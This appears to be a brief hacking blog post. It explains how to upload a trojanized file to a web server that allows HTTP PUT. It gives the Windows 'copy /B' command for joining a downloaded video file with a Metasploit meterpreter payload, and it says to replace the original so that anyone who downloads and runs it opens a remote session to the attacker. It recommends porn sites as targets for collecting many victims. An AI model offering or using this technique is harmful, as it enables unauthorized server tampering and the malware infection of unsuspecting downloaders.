I’m going to combine my two previous posts here and here,now for this exploit in combining files. Say you find a site vulnerable against PUT * HTTP/1.0 that has downloadable content. So I would recommend downloading a file off the server in this case for me it will be 03.mpg. I’m going to combine 03.mpg with my Metasploit Binary Payload meterpreter.exe.
We can use Windows command prompt in order to do this.
C:\ >copy /B 03.mpg + meterpreter.exe file.mpg
03.mpg
meterpreter.exe
1 file(s) copied.
The copy /B make the output a binary file. So now you can take file.mpg rename it to 03.mpg and PUT it back on the server, whenever someone downloads the file and runs it, it will spawn a meterpreter session to you. Say you do this on a porn site you can get multiple meterpreter sessions for easy exploiting.
Enjoy!
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment